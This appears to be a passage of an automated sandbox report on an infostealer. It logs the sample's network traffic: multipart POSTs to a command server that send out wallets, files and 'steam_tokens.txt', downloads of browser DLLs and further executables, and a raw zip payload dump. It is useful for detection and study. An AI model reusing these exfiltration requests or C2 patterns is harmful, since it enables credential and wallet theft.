61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file"------BFIIEHJDBKJKECBFHDGH--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHIHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wallets------JJJKFBAAAFHJEBFIEGID--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="message"files------GHDHJEBFBFHJECAKFCAA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCFBKFCFCBGDGIEGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="file"------CAFBGHIDBGHJJKFHJDHC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 185.172.128.76Content-Length: 97119Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCBHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 2d 2d 0d 0a Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="message"her7h48r------AFCBFIJEHDHCBGDGDGCB--
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49718 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

6_2_0042676C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 26 Apr 2024 14:55:49 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec

Source: global traffic	HTTP traffic detected: GET /load/load.php?c=1000 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /load/th.php?c=1000 HTTP/1.1Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /load/dl.php?id=425&c=1000 HTTP/1.1Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /load/dl.php?id=444 HTTP/1.1User-Agent: InnoDownloadPlugin/1.5Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /load/dl.php?id=456 HTTP/1.1Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /385128/setup.exe HTTP/1.1Host: monoblocked.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /385128/setup.exe HTTP/1.1Host: c.574859385.xyzConnection: Keep-Alive
